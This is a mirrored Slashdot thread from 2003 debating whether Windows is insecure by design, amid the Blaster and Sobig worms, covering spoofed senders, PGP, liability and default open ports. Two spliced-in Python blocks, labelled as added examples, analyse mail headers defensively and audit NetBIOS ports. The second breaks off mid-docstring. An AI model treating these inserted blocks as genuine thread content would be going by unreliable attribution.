Slashdot Mirror


Windows Is 'Insecure By Design,' Says Washington Post

Circuit Breaker writes "A Washington Post article says Microsoft Windows is insecure by design. Quote: 'Between the Blaster worm and the Sobig virus, it's been a long two weeks for Windows users. But nobody with a Mac or a Linux PC has had to lose a moment of sleep over these outbreaks -- just like in earlier "malware" epidemics. This is not a coincidence.'"

237 of 1,326 comments

  1. Ummm... by Exitthree · · Score: 4, Funny
    But nobody with a Mac or a Linux PC has had to lose a moment of sleep over these outbreaks -- just like in earlier "malware" epidemics.

    Except the Mac and Linux users in charge of those systems... ;)

    1. Re:Ummm... by Li0n · · Score: 5, Insightful

      indeed...

      I've had to patch and put up to date almost a dozen systems in my free time these weeks. Not seeing one penny for that since they all belong to friends and family... :/

      That aside from the bozos at work that got hit and the flood of questions along the lines of "my computer keeps rebooting on me every time I connect to the Internet... what can it be?..."

      And people wonder why techies are grumpy...

      --

      ~
      ~
      :wq
    2. Re:Ummm... by aussersterne · · Score: 5, Insightful

      Not only for that reason.

      I don't have Windows anywhere and haven't for several years now. I don't run Outlook. But it turns out that at least one of the current batch of worms spoofs email addresses.

      So all week I've been getting email messages from postmaster@ saying "...your message to so-and-so will not be delivered because it contained the SoBig worm, we advise you to download a security update from..." I wrote a couple of them and got two responses from mail admins saying essentially "Yes, we know it spoofs your email, sorry there's nothing we can do, please understand that we're under tons of pressure on our end, everyone is infected, this worm sucks, you have it easy, you run Linux, stop complaining!"

      Anyway, people are receiving messages marked "from" my email address and are getting infected with a worm as a result. Obviously one or several people (editors, management, etc.) that have me in their Outlook address books have become infected and now the worm is spreading from their machines and spoofing my email address as the source. I totally resent this and actually worry about my liability.

      Do I now have to trademark my own email address or something and then include a disclaimer in my email saying "This email address is my trademark, you are not allowed to add me to your address book in any way"?

      The crap Windows security model has certainly affected me, a non-Windows user.

      --
      STOP . AMERICA . NOW
    3. Re:Ummm... by cybermace5 · · Score: 4, Insightful

      Also, don't forget the Mac and Linux users who unfortunately happened to be in the address book of some poor Windows user. I'm about to go nuts from the 50-100 autoreplies from corporate virus scanners, and I know I have it easy.

      --
      ...
    4. Re:Ummm... by theCoder · · Score: 5, Funny

      "...you have it easy, you run Linux, stop complaining!"

      That's when you snap your suspenders, scratch your beard, and remember why you have that smug look on your face :)

      --
      "Save the whales, feed the hungry, free the mallocs" -- author unknown
    5. Re:Ummm... by Geek+of+Tech · · Score: 5, Funny
      And people wonder why techies are grumpy...

      Well, yeah, because you know we all make so much money...

      Yeah.....

      --
      Stop the Slashdot effect! Don't read the articles!
    6. Re:Ummm... by nikal · · Score: 5, Insightful

      If you digitally signed all of your electronic communication then you could effectively get rid of this worry. People who trusted your key would know immediately that this was a spoof.

      --
      kojent
    7. Re:Ummm... by afidel · · Score: 4, Insightful

      PGP sign all your email, that way you will be able to prove that an infecting email did not originate from you. Also the very fact that it is a windows worm and you run Linux should indemnify you.

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
    8. Re:Ummm... by Jerf · · Score: 4, Insightful

      To you and nikal, PGP does not prove X did not come from you, it only proves that X did come from you. Even if you are using PGP it is quite easy to send an unsigned message.

      Only somebody else's signature, establishing that it came from them, could begin to establish that it did not come from you, and you would still need to establish that you aren't that somebody else, since having multiple signatures is trivial. (It would probably be reasonably satisfactory under most normal circumstances, though.)

    9. Re:Ummm... by Deusy · · Score: 4, Interesting

      On the subject of liability, I wonder why Microsoft is never held liable for the billions of dollars that these incidents cost the world's economies. With a little forethought this would never have happened.

      Imagine if Ford were to sell a car with a fundamental problem. One that potentially cost lives. They did and they had to recall it.

      Now these virus epidemics probably bring down some rather critical computers and potentially cost lives. (Yeah, yeah, mission critical machines should be kept uber patched...)

      Microsoft really comes across as untouchable.

      --

      Free Gamer - Free games list and commentary

    10. Re:Ummm... by hankaholic · · Score: 2, Informative
      now the worm is spreading from their machines and spoofing my email address as the source. I totally resent this and actually worry about my liability.
      To whomever modded this post up, you have apparently been trolled.

      First of all, your fear of liability is irrational. If it is known and documented that a trojan will forge the sender address, and the headers show that the mail was not sent from your ISP, it sounds like you're in the clear. Even if it were sent from your ISP, one would have to show that you controlled that IP at the time the message was sent.

      Furthermore, unless you can cite a case in which a user was held responsible for the activities of a trojan running on his or her system, I feel pretty safe in calling you paranoid. Unless you did knowingly spread the trojan, you're fine, except for the aforementioned paranoia.

      That aside...

      Do I now have to trademark my own email address or something and then include a disclaimer in my email saying "This email address is my trademark, you are not allowed to add me to your address book in any way"?
      Nice try.

      Too bad you seem to have no clue what trademark actually covers. Contrary to what you seem to believe, owning a trademark does not give you exclusive right to control the use of a certain combination of letters in the Roman alphabet.

      This means that Bertelsmann can't do a damned thing about me saying "Bertelsmann" here. Bertelsmann Bertelsmann Bertelsmann. Nor can the RIAA. From the USPTO:

      A trademark is a word, phrase, symbol or design, or a combination of words, phrases, symbols or designs, that identifies and distinguishes the source of the goods of one party from those of others.
      As long as I'm not using a trademark to mislead people by implying that a product was provided by the company which holds that trademark when the product hadn't really been provided by said company, there really isn't a problem.

      Go try to register your email address at the USPTO. If you succeed, let me know what it is, and I'll email you letting you know that I heard a story about the Recording Industry Association of America (TM) was suing students from colleges including Princeton University (TM), that I saw the story on MTV's (TM) website, as well as on the news on a Time-Warner (TM) station, and that the students were likely running Microsoft (TM) Windows (TM).

      Then I'll invite you to imitate the actions of The SCO Group (TM) and file a lawsuit against me which is destined to do nothing but waste court time.

      Hell, you can even forward a copy to each of the companies which own the aforementioned trademarks.

      When the court case is thrown out, I'll buy you a cup of coffee at Starbucks (TM), which buys its milk from Horizon Organic Dairy (TM).
      --
      Somebody get that guy an ambulance!
    11. Re:Ummm... by Li0n · · Score: 5, Insightful

      They cease to be liable the moment you click "I Agree"

      --

      ~
      ~
      :wq
    12. Re:Ummm... by Anonymous Coward · · Score: 2, Interesting

      it's quite simple.
      to all future emails,
      add the tag line
      "All of my email messages are pgp signed.
      if you receive an unsigned message
      with my address, IT DID NOT COME FROM ME"

    13. Re:Ummm... by tietokone-olmi · · Score: 2

      That's when you start cryptographically signing all of your outgoing mail.

      A little bit of public-key cryptography evangelism couldn't hurt, either.

    14. Re:Ummm... by LinuxGeek · · Score: 4, Insightful

      It doesn't have to be legal liability to cause trouble. A pissed off client, boss or girlfriend can be plenty of liability to have to deal with. If they have trouble understanding the actual causes, then good luck reasoning with them.

      --

      Kindness is the language which the deaf can hear and the blind can see. - Mark Twain
    15. Re:Ummm... by Sandor+at+the+Zoo · · Score: 4, Interesting
      I've had to patch and put up to date almost a dozen systems in my free time these weeks. Not seeing one penny for that since they all belong to friends and family... :/

      That's why I tell my family: If you want help with your computer, buy a Mac. I don't support PCs.

      Just about everyone in my family has a Mac.

      It's a win-win for me, since the amount of support you have to do for a Mac user is virtually nil -- they just work. :-)

    16. Re:Ummm... by Capsaicin · · Score: 2, Insightful

      They cease to be liable the moment you click "I Agree"

      That depends on the various sales of goods statutes of the several jurisdictions in which M$ products are sold. It is not uncommon for such exemption clauses to be explicitly limited or even completely abrogated by legislation.

      --
      Better to be despised for too anxious apprehensions, than ruined by too confident a security. --Edmund Burke
    17. Re:Ummm... by johnny0101 · · Score: 2, Interesting

      If you were an unscrupulous weasel, then no, putting that at the bottom of your emails would not make it true. But if you *always* sent your mail pgp, then any mail *not* pgp would not be from you. That is what the poster intended to say IMO.
      However, you have a valid point, that, say in some sort of legal setting, you would not be able to prove that the mail wasn't from you.

      --

      ----
      In Soviet Russia, the overlords welcome you!
    18. Re:Ummm... by thx2001r · · Score: 3, Interesting

      Windows security, (don't laugh) on NT 5 and up is not too shabby (when properly done... not to say that it is "secure", no systems plugged into electricity and a network are). The problem is not the security model, it's the default level of security applied out of the box. The default level is so lax, it is WISHING it were swiss cheese!

      There are so many open orifices by default, it's, honestly, frightening to release a Windows system to the wild of being connected to the Internet without extensive preventative measures. Of course, keeping safe in a Windows environment is very possible but almost exclusively for technically savvy people; the rest of the Windows users (almost all of them) are running Windows with its default pants down, bent over, with a giant neon "Rape Me" sign on them.

      Sigh. Perhaps someday MS will enable some more of their security features BY DEFAULT on Windows (well, let's say, all of them, and then let users drop their computer's drawers if they choose to). Until then, look at it this way... MS's (deliberate?) default swiss cheese security keeps many a person employed plugging the holes.

      If it were secure by default and kept itself in great working order automatically, what use would anyone have paying techies to do that? In a strange way, I owe my continued employment to MS's poor default practices.

      --

      -Joe
      If we're all god's children, what's so special about Jesus? - Jimmy Carr

    19. Re:Ummm... by Durandal64 · · Score: 4, Interesting

      As sick as defending Microsoft makes me feel, I'm going to have to point out that your analogy isn't fair. A more apt analogy would be Ford making a car with a radio so defective that the car would explode if it received a signal of a certain frequency. Ford learns of this and initiates a recall. People ignore the recall, and then someone hijacks an antenna two weeks after the recall has been initiated and broadcasts said signal of said frequency. Cars explode.

      Did Ford send the signal out? No, so they are not directly liable. Did they attempt to correct this problem before it was taken advantage of? Yes. Should such a disastrously massive problem have been allowed to make it into the final design? Microsoft do share some liability for the damage done, but not all of it. It was, after all, their incompetence that created the problem in the first place. Is it all their fault? No, sorry.

      The other angle to look at is the cost of installing the patch. Since Windows requires you to reboot after changing all but the most trivial aspects of your system, this makes installing the patch extremely inconvenient for many server administrators. Administrators have no such excuse with a Linux system, which really only requires a reboot after changing the kernel. On Windows boxes, however, such required restarts can end up costing a lot of money, especially if the patch breaks a service that the server is running. So, one thing Microsoft could do would be to reduce the amount of required restarts. Good luck, since the GUI is the operating system, unlike a *nix box, where it's just another process that can be terminated without bringing down the system.

      As I said, I now feel sick for sticking up for the pricks in Redmond.

    20. Re:Ummm... by LetterJ · · Score: 2, Informative

      I patch regularly, run a hardware firewall and have gotten exactly 1 virus on a computer I own (in 1996 from a floppy disc in a college lab) and even that didn't get off the floppy, and I still was affected as I received 1000 infected emails per day at the end of last week as *other* people got infected and sent messages both to and from me without my involvement. Aside from guarding my email address with my life (gee, my customers would love that policy) no amount of due diligence would have prevented the problems I received.

    21. Re:Ummm... by Tyreth · · Score: 2, Interesting

      I think I'd tend to be a bit heartless. I'd inquire into why they are using windows. If it's necessary, then I'd help them. If it was unnecessary, then I'd *strongly* encourage them to use Linux, and ask them why I should waste my time just so they can save time learning something new.

      Luckily I haven't had anyone ask me - I guess I don't advertise my computer skills enough :)

    22. Re:Ummm... by SillySlashdotName · · Score: 4, Funny

      As well as bashful, sleepy, sneezy, dopey,...

      --
      Acts of massive stupidity are almost never covered by warranty. --me.
    23. Re:Ummm... by ball-lightning · · Score: 5, Insightful

      MS is at fault, the root of it, to be sure.

      It's kind of funny, but I didn't have any problems with either of those viruses in any of my three WinXP machines. Maybe it was the common sense (Sobig) or the fact all my machines were updated (MS Blaster) or the common sense that 300 e-mails with the same attachment from people I don't know might, just might be a virus. This is not to mention of course the firewall, pestpatrol, and Norton Antivirus. Now, you might say, "well hey, my linux box had none of that, wasn't patched, no firewall, nothin!" but think for a few seconds. These viruses were programmed for windows, not linux/any other os. Of course your non-windows computer was not infected, because the virus/worm was not made for it. So before you get on your high horse, remember it can happen if someone bothers to write it.

    24. Re:Ummm... by 1lus10n · · Score: 5, Interesting

      please please please PLEASE do not reference wired if you wish to garner any kind of respect.

      and just for reference (as a person who works hell desk (tech support) for linux servers) i have not yet met a single person affected or infected by slapper. unix and unix derivatives are vastly more secure because of the way they were designed. not to mention most distros dont leave 45 unnecessary things running by default, hence the admin of a unix box has to do less to be decently secured.

      i will admit this virus wasnt particularly microsofts fault. but we have been doing this same routine for 8-10 years now with them. sooner or later they are going to have to own up to it, and yes microsofts systems are inherently insecure. and no i dont run anything M$ on anything i own or admin.

      i am also very aware that i am having a bad spelling day.

      --
      "Two things are infinite: the universe and human stupidity; and I'm not sure about the the universe." --Albert Einstein
    25. Re:Ummm... by andreMA · · Score: 5, Informative
      Yes, so very many of them:
      • Sunday, October 06, 2002 10:08:43 US/Pacific: Installed "Security Update 2002-09-20" (1.0)
      • Sunday, October 06, 2002 10:09:19 US/Pacific: Installed "Internet Explorer 5.2 Security Update" (5.2.2)
      • Sunday, October 06, 2002 10:21:30 US/Pacific: Installed "Mac OS X Update" (10.2.1)
      • Friday, February 14, 2003 18:31:25 US/Eastern: Installed "Mac OS X Update" (10.2.4)
      • Friday, March 07, 2003 17:43:42 US/Eastern: Installed "Security Update 2003-03-03" (1.0)
      • Sunday, March 30, 2003 22:10:29 US/Eastern: Installed "Security Update 2003-03-24" (1.0)
      • Saturday, April 12, 2003 13:35:20 US/Eastern: Installed "Mac OS X Update" (10.2.5)
      • Tuesday, May 13, 2003 14:28:01 US/Eastern: Installed "Mac OS X Update" (10.2.6)
      • Tuesday, June 10, 2003 12:52:53 US/Eastern: Installed "Security Update 2003-06-09" (1.0)
      • Sunday, June 22, 2003 15:12:53 US/Eastern: Installed "Security Update 2003-06-09" (2.0)
      • Thursday, July 24, 2003 15:30:54 US/Eastern: Installed "Security Update 2003-07-14" (1.0)

      This includes security updates and point-revisions of the OS (which one might presume to have less-critical security updates rolled into them), and excludes application specific updates for the i-App suite, Safari, etc. that were not labelled as "Security" related (one might assert that they were in fact security related, but they included point-upgrades to the applications as well. Those totalled perhaps 8-10 updates over the span covered). Note that two (Stuffit! and IE) are for 3rd-party bundled apps with labelled "Security" updates.

      yes, I'm aware that I haven't installed the latest one to patch the off-by-one bug that impacts the FTP server. I'm waiting until I need to reboot for some other reason.

      TOTAL UPDATES OVER THE PAST 10 MONTHS: 5. 7 if you count patches to 3rd party apps, one of which was IE. 10 if you're really liberal and include the point-revisions of the OS too.

      Please tell me where these "lot of security updates in the past 6 months" are... I'm not seeing them.

    26. Re:Ummm... by dtfinch · · Score: 2, Insightful

      Unfortunately, I live in the poorest town in the poorest county in the poorest state in the USA. We have a nearby University pumping out moderately skilled CS grads who either move away or compete in a small economy, where most employers see $10 an hour as a fair starting wage for programmers. But the scenery is great, and family is nearby.

    27. Re:Ummm... by oliphaunt · · Score: 4, Interesting

      why not offer them a choice?

      I'll help you move to linux for free, or I'll charge you $50 to fix your system this time.

      tell them the charge will double each time they need help, for either system.

      --

      Humpty Dumpty was pushed.
    28. Re:Ummm... by caouchouc · · Score: 2, Insightful

      Your suggestion has some merit, but it involves the Outlook users installing and learning to use some public key encryption implementation like GPG.

      For most, this process is completely out of the question. These are the same people who can't be bothered to apply patches or switch to a much less frequently compromised e-mail client.
      These people aren't going to change their habits unless actually forced. It's either that or something needs to be implemented that will transparently protect them from themselves with 100% effectiveness (AV software is useful and all, but it has obviously failed in this regard).

      Right now, the only viable defense is vigilance.

    29. Re:Ummm... by dabootsie · · Score: 2, Informative

      Full headers of the e-mail in question would indemnify you, as the originating IP is added by the first SMTP server to deal with the message and can't be spoofed by the client.

    30. Re:Ummm... by ball-lightning · · Score: 2, Interesting

      please please please PLEASE do not reference wired if you wish to garner any kind of respect.

      ok

      And I wouldn't be surprised if Longhorn had built-in virus protection. Not only would it make the OS less susceptible to viruses/worms/etc, but it would also be a nice revenue stream for Microsoft (like they'd give away the definitions for free, maybe bundle them with windows patches). And just for the record, the last virus I actually got was the Italian A virus (an old dos virus).

    31. Re:Ummm... by togtog · · Score: 3, Insightful

      The one difference would be this;

      Two months after that recall, Ford issues a recall for steering wheels, because they can crack and make it hard to control the car. Three months later they issue a recall for their electrically adjusted seats, which when hit by a certain radio signal fold forward on the occupants of the car. Then only one month after that they issue another for the radio again; this time, if playing any old CD, the radio may emit a really loud tone until disconnected. Then five months after that they issue a recall for their A/C, in which the improper placement of a connecting hose in relation to the engine can cause it to start burning, emitting a nasty smoke unless the A/C is turned off. Two months later a recall is done for door locks that, when jarred (such as slapping the door or slamming it), may unlock, coupled with Ford's new Easy Go(tm) keyless one-button start feature.

      It's not just one recall, it is a long history of problems one after another. Some from their own stupidity, some from the stupidity of others.

      The only thing that could save Microsoft would be a total rewrite of windows to go back to the 3.1 daze of a GUI and an OS as you mention. Unix does it, Linux does it, and Apple now does it (yuck, defending Apple, *vomits and then ducks*).

      I doubt we will see a rewrite any time soon however, for one thing it would be a shit load of work, take a long time, probably be as filled with bugs and holes as the current generation of Microsoft products for at least the first year or more, and probably break all current software, might as well save it for the 64bit processors.

      Sorry for the lack of grammar *ducks again*, cheers!

      -tog

    32. Re:Ummm... by xQx · · Score: 2, Interesting

      wow, 10USD per hour... life must be tough.

      The average family wage in australia is $10.50 USD per hour. ($35,000AUD / 2000Hours * 60c)

      Tell me, how do they cope?

    33. Re:Ummm... by shepd · · Score: 2, Interesting

      >Tell me, how do they cope?

      Dunno, but the difference is due to the very low GDP for Australia vs. the very high GDP for the USA. That accounts for the difference in wages between many different countries.

      In the US itself, though, there are places where $10 US an hour is well below poverty and you would be expected to drift from shelter to shelter (Parts of California), and also places where $10 US an hour will make you rich (Alaska?).

      The US is quite strange like that.

      --
      If you could be told what you can see or read, then it follows that you could be told what to say or think - BoC
    34. Re:Ummm... by Jondor · · Score: 2, Interesting

      Of course the next windows will have virus protection. MS just bought an anti-virus company. But.. will those people who don't patch update the data files? And will MS have the data available in time and correct?
      And of course, for years to come a lot of people will be perfectly happy with older versions of windows..
      So don't get your hopes up. Besides, now that everybody (ahum) is protected we don't have to fix IE and outlook anymore, do we?

      --
      Nobody expects the spanish inquisition!
    35. Re:Ummm... by MickLinux · · Score: 2, Informative

      Nope. Don't do it that way. You're liable to promote Linux to their system, and yourself into homelessness.

      ---

      Use a proper business model:

      "Okay, my first charge for help is going to be $100 -- $50 for one hour of help, and another $50 for a second HDD, installing a dual-boot Debian Linux on your computer. At that point, you have a choice about which system you want to boot into, and it will make it easier for me to disk-image your Windows system directories, and fix your problems. One thing, though: keep all your program CDs in one place for quick reinstall; your programs installed in c:\my programs; your downloaded programs in c:\my downloads\programs; and all your documents stored somewhere under c:\mydocuments. That will keep things simple for me, and cheap for you.

      "After that, I'll charge $50/hr for service, but it will be a ton cheaper, because I'll often simply restore the image of your OS directory. Indeed, I'll show you how to do it.

      ---

      Quite honestly, as they get used to using Linux, they'll start to forget Windows. I know I did. It's still on my system. Eventually, though, I had to completely reformat my Win98 HDD and reinstall. This time, the reinstall for some reason never gave me Word, which was in the original software set, and I can't figure out how to get it [and it is one of my main reasons for keeping Windows around.] But interestingly, with the reinstall, I ended up doing it a second time and installing almost nothing, but lo and behold, my HP DJ1120c print driver, which used to crash on the loaded system, still crashes on the empty system, and now it's clear that it is an OS bug, since it crashes other things, too. So my other major reason for keeping Windows around, a better print driver, is also bogus.

      Well, as people start to realize this stuff, they're going to drop Windows on their own. And you're not going to make yourself poor, servicing them for free.

      --
      Correct Horse Battery Staple: 72 bits of entropy. Enter "Correct H" into google. When it generates the phrase, that's
    36. Re:Ummm... by Cederic · · Score: 5, Insightful


      >> this virus wasnt particularly microsofts fault

      If you're talking Sobig.F then yes, it is definitely Microsoft's fault.

      In the early 1990s, people got laughed at (or gently educated) if they suggested 'I got that virus through email'. It just didn't happen.

      Then MS turn up with their inherently insecure 'Automatically run stuff that's emailed to you' email client, actually build it into the OS (thus ensuring greater take-up than would otherwise have been achieved) and email viruses became commonplace.

      The only way this virus wasn't Microsoft's fault is that they didn't write it themselves. The environment it runs in, that enabled it, is entirely and absolutely due to insecure design by MS.

      ~Cederic

    37. Re:Ummm... by mindriot · · Score: 2, Informative

      Well, but given a simple look in the mail headers, you can well prove that the infected mail did not come from you.

      I recently got a load of Failure Notices to my University mail account that claimed the mail I had sent was infected with a virus (I think it was an earlier SoBig variant). Well, the notice included the header of the original email, which in turn included the Received: line I was looking for.

      The guy's computer (in another dorm) was denied net access by the computer center after my mail to their abuse handler until he proved to the net admins in his dorm that his box was clean again.

      In short: to anyone who asks you, you can effectively prove the mail did not come from you. Unless, of course, you're in via some dialup provider which happens to be the same the sender of the virus mail used; that makes it a bit harder.
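The header check mindriot and dabootsie describe, written out as an added example (not code from the thread): it unfolds the Received: chain quoted in a constructed bounce notice, walks down the chain only as far as hops stamped by servers you trust, and reports whether the IP that handed the message to that trusted infrastructure belongs to your own network. All host names, addresses, IPs and the trusted-server set are constructed assumptions; the same-dialup-provider caveat from the comment shows up as `from_my_network` coming back True, in which case the headers alone do not clear you.

```python
import re
import ipaddress

# Constructed sample bounce: a "failure notice" that quotes the headers of the
# worm-generated message. Hosts, mailboxes and IPs are made up (RFC 5737 ranges).
BOUNCE = """\
From: postmaster@example.net
To: alice@example.org
Subject: Failure notice: your message contained a virus

Your message to bob@example.net was not delivered because it contained
the SoBig worm. Headers of the original message follow:

Received: from mx1.example.net (mx1.example.net [198.51.100.10])
    by mail.example.net with ESMTP id 17; Fri, 22 Aug 2003 10:01:02 -0400
Received: from ALICE-PC (dorm-42.dialup.example.com [203.0.113.77])
    by mx1.example.net with SMTP id 16; Fri, 22 Aug 2003 10:01:01 -0400
From: alice@example.org
To: bob@example.net
Subject: Re: Thank you!
"""

RECEIVED_RE = re.compile(r"^Received:\s*(?P<body>.*)$", re.IGNORECASE)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
BY_RE = re.compile(r"\bby\s+(\S+)", re.IGNORECASE)


def unfold_headers(text):
    """Join RFC 822 continuation lines (leading whitespace) onto the line above."""
    lines = []
    for raw in text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += " " + raw.strip()
        else:
            lines.append(raw)
    return lines


def received_chain(text):
    """Return the Received: header bodies in the order they appear.

    Each relay prepends its own line, so index 0 is the newest hop and the
    last entry is the hop closest to the machine that originated the message.
    """
    chain = []
    for line in unfold_headers(text):
        m = RECEIVED_RE.match(line)
        if m:
            chain.append(m.group("body"))
    return chain


def originating_hop(chain, trusted_hosts):
    """Walk from the newest hop downward while each hop was stamped *by* a
    server we trust. The last such hop records the IP that actually handed the
    message to trusted infrastructure; anything below it was written by the
    sender and can say whatever the worm wants, so it is ignored.
    Returns (ip, hop_text) or None if no trusted hop with an IP was found."""
    last_trusted = None
    for hop in chain:
        by = BY_RE.search(hop)
        if not by or by.group(1).lower() not in trusted_hosts:
            break
        last_trusted = hop
    if last_trusted is None:
        return None
    ip = IP_RE.search(last_trusted)
    return (ip.group(1), last_trusted) if ip else None


def sent_from_my_network(ip, my_networks):
    """True if the originating IP falls in an address block you or your ISP use."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(net) for net in my_networks)


def analyze_bounce(text, trusted_hosts, my_networks):
    """Summarise what the quoted headers prove about where the mail came from."""
    chain = received_chain(text)
    hop = originating_hop(chain, trusted_hosts)
    if hop is None:
        return {"hops": len(chain), "origin_ip": None, "from_my_network": None}
    ip, _ = hop
    return {"hops": len(chain), "origin_ip": ip,
            "from_my_network": sent_from_my_network(ip, my_networks)}


if __name__ == "__main__":
    # Assumed: example.net's two relays are trusted; "my" ISP block is 192.0.2.0/24.
    print(analyze_bounce(BOUNCE, {"mail.example.net", "mx1.example.net"},
                         ["192.0.2.0/24"]))
```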

    38. Re:Ummm... by Cederic · · Score: 2, Informative


      Email viruses for a long time couldn't be prevented by the end user, if that user was using Outlook/Outlook Express.

      If I get an attachment called 'summary.txt' then I tend to assume it's a text file, and will view it to see its contents. In OE it may actually have been 'summary.txt.pif', an executable virus. A system that allows that mistake to happen has inherent design flaws.

      For the record, that's one reason I've never used Outlook Express. I use mail systems that tell me what I've received, and that will handle attachments in the manner I expect.

      Calling people 'stoopids' may make you feel superior, but doesn't alter the insecurity of the design of many MS products.

      A lot of users are ignorant. There are solutions to that problem that don't include introducing a whole new class of virus (email viruses), or leaving systems open to remote attack (e.g. MSBlast) by default.

      ~Cederic

    39. Re:Ummm... by BigBir3d · · Score: 2, Informative

      The Washington Post article implies that OS X or linux is by default 100% secure. Most of us here at slashdot know that to be untrue.

      1 per month is a fairly small number, I agree. But for your average clueless user... "I just did that last month, now I have to do it again? I thought I bought an iMac so I didn't have to do this anymore..."

    40. Re:Ummm... by jonadab · · Score: 5, Interesting

      Exchange rates don't mirror cost of living, necessarily. The Aussie
      buck isn't worth as much as the US buck on the international market,
      but that isn't because the Aussie buck won't buy as much, locally,
      as the US buck will buy in the US.

      An example: the exchange rate between where I live (Galion Ohio)
      and lower Manhattan is 1:1 -- one dollar from here is worth exactly
      one dollar from there. Yet, an entire family here can live on less
      money per month than the rent of a two-room apartment there.

      The exchange rates do have an impact on the cost of living, as they
      have an impact on the cost of some items, but not everything is
      priced proportionally.

      Here, $10/hour is a decent wage for a single person in a blue-collar
      or entry-level position. I take home about that amount after taxes,
      working as an entry-level computer troubleshooter (basically, a
      one-man part-time IT department at a place too small to have a
      full-time IT department), but a professional programmer would
      certainly make more than that (except, I doubt if we have any in
      the area). Forty minutes' drive south of here there's a big
      white-collar area (Worthington/Westerville, suburbs of Columbus --
      conference complexes, marketing firms, shopping malls, and
      three-quarter-million-dollar houses[1] as far as the eye can see)
      where someone in a position equivalent to mine would make triple
      my wage and struggle to get along. Rent is much higher there;
      food costs more; everything costs more. A lot of people live up
      this way and commute to work down there.

      [1] Nobody would build a house that expensive in Galion, because
      it wouldn't have resale value. We have a sparse handful of
      houses in town worth two hundred thousand or a little more.
      Part of it is that the land here is much cheaper.

      --
      Cut that out, or I will ship you to Norilsk in a box.
    41. Re:Ummm... by jonadab · · Score: 2, Insightful

      > yeah actually since we are on the topic it is woz's fault for
      > making computers accessible

      Herring. Dark pink. Outlook Express is *less* accessible to the
      end user, *harder* to learn to use, than other email clients that
      existed sooner (e.g., Pegasus Mail). Yet in the history of
      computing Outlook is the *only* known, documented case of any email
      application being the medium for transmission of a virus. There
      is absolutely *zero* reason for a mailreader to behave the way it
      does (automatically executing received content); other mailreaders
      that are even easier to use don't do it that way, because there is
      no *reason* to do it that way. Of all Microsoft programs ever,
      no other is so much a plague and a nuisance as Outlook. Without
      reservation I can say that the world would be a better place if
      Outlook had never been developed.

      --
      Cut that out, or I will ship you to Norilsk in a box.
    42. Re:Ummm... by Prior+Restraint · · Score: 2, Interesting

      Another thing people seem to forget is that when Microsoft first announced this functionality, the op-eds were full of warnings that email viruses were just around the corner. Microsoft's position at the time was that the benefits would outweigh any theoretical risk.

    43. Re:Ummm... by FiskeBoller · · Score: 2, Interesting

      Worse than that ... at the time I worked for Microsoft, I spoke out about the feature becoming used for virus transmission. This statement was made directly to Ballmer in a room of 400 developers ... and the room went silent.

      Nothing was ever done about the issue.

    44. Re:Ummm... by pmz · · Score: 2, Funny

      Well, yeah, because you know we all make so much money...

      I am literally a millionaire and own loads of property in New York. However, I simply don't know why the bank teller keeps saying, "Sir, Parker Brothers is not a part of the U.S. Treasury, and we cannot exchange this money for you." This liquidity problem is really keeping me from living the lifestyle I worked so hard for. The world is so unfair.

    45. Re:Ummm... by bhtooefr · · Score: 2, Funny

      I can just imagine that:

      "Outlook Express will have automatically running scripts!"

      "DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS!"

      "This is a COOL feature!"

      "DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS! DEVELOPERS!"

      "But won't automatically running scripts be used for virus transmission?"

      *silence*

      Well, you did say it was in a room of 400 developers! Did you not?

  2. Good point, muddled way of expressing it by Raindance · · Score: 5, Insightful

    There's a large difference between "Windows is insecure by design" and "Windows was not designed to be secure or with security in mind" just as there's a significant difference between saying "Impalas are deathtraps by design" and "Impalas were not designed with safety in mind".

    That said, and though the Post's article was a little muddled in general, I agree with the spirit of the article in that
    1) it's reprehensible that Microsoft apparently didn't have security (a broad term, but the literature to define it is out there) as a guiding design principle when they designed Windows, and
    2) as a result of this, items central to the functioning of Windows do not lend themselves to good security.

    1. Re:Good point, muddled way of expressing it by the+Man+in+Black · · Score: 5, Insightful

      I didn't take that phrase that way until I read your post. The writer isn't stating that Windows engineers designed the OS to be insecure, he's stating that the way Windows was designed lends itself to insecurity. Two different takes on the phrase "by design". Slightly misleading, sure, but he clarifies in the article, so it's cred by me. I particularly like the comparisons he makes with Windows, OS X, and Red Hat's default install.

    2. Re:Good point, muddled way of expressing it by rekkanoryo · · Score: 5, Insightful
      The problems with Windows are largely what was pointed out in the article:
      • Users complain they don't trust Microsoft and don't apply Critical Updates
      • XP's firewall is off by default and takes at least five steps to turn on
      • XP leaves five ports open by default--three of them are 137, 138, and 139, the NetBIOS over TCP/IP ports
      I have the following to say on those issues, however:
      • If users don't trust that Microsoft can patch a hole, they shouldn't use Windows and shouldn't buy PCs preconfigured with Windows, no matter how crappy the software availability and quality for the alternatives
      • For the XP Home software, all dialup interfaces should have the firewall on by default. XP can automatically detect broadband connections as well, so on broadband internet connections the firewall should also be on by default
      • Ports 137 through 139 should be disabled by default until file sharing is turned on. And even then, those ports should be specifically closed on all internet-facing interfaces. The port that console messages are sent on should be closed to the internet-facing interfaces as well, and probably just closed period on Home since console messages are supposed to be used by administrators in domain environments
      These are not the only problems with Windows, nor are the solutions I propose going to be 100% fool-proof. But most of the problem comes down to users' carelessness or naivete. Unimportant messages in XP such as
      • Get a Passport
      • Take a tour of Windows XP
      should wait until after more important, security-related messages such as
      • If you choose to use Windows Automatic Updates, your computer will automatically update itself with the latest security patches. This will ensure fewer problems and enhanced reliability while your computer is connected to the Internet. Click here to learn more.
      • If this computer will be directly attached to the Internet through either a dial-up modem, a cable modem, or a DSL modem, you should enable the Internet Connection Firewall by clicking here and following the instructions. The firewall will help protect your computer from hackers and self-spreading worms on the Internet, keeping your computer working properly much longer.
      It's simple steps like these that, on top of proper security considerations and testing when designing and writing the code, will help protect users and the net in general from what we suffer right now.
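As an added example (not code from the thread or any poster), the exposure the comment above describes can be checked mechanically: audit a netstat-style listing for the NetBIOS ports it names (137, 138, 139) and report which are reachable through an internet-facing interface. The interface roles, addresses and sample output are constructed for the example.

```python
"""Added example, not from the thread or any quoted post: audit a
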